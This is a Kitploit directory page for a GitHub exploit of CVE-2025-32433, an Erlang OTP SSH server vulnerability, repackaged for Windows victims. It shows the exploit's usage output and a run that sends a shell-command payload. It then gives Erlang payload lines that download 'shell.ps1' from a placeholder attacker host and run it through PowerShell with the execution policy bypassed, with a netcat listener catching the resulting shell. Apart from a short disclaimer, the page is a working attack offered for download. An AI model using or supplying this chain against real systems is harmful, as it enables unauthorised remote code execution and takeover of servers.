Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32433-available-for-windows — CVE-2025-32433-available-for-windows-victims | Kitploit
Tools/GitHubGitHub/blackcat4347/cve-2025-32433-available-for-windows
Payload GenerationVulnerability AnalysisExploitationCommand and ControlLearning & EducationRemote Access Tool
GitHubblackcat4347/cve-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows-victims

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
37 months agoNot yet reviewed
Share

CVE-2025-32433

Information about the vulnerability: https://nvd.nist.gov/vuln/detail/CVE-2025-32433

POC

root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
usage: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]

Exploit for CVE-2025-32433 (Erlang OTP SSH server).

options:
  -h, --help           show this help message and exit
  -d, --debug          Print raw response in hex format
  -t, --target TARGET  Target host (default: 127.0.0.1)
  -p, --port PORT      Target port (default: 2222)
  
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: your command
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.

get payload

root@kitploit:~
inets:start(), {ok, {_, _, Body}} = httpc:request("http://ip_attack/shell.ps1"), file:write_file("C:/Users/Public/shell.ps1", Body).

Create a netcat listener session and execute the command.

root@kitploit:~
os:cmd("powershell.exe -ExecutionPolicy Bypass -File C:/Users/Public/shell.ps1").

Disclaimer

This tool is for educational purposes and authorized security testing only. The author is not responsible for any misuse or damage caused by this script.

Download Tool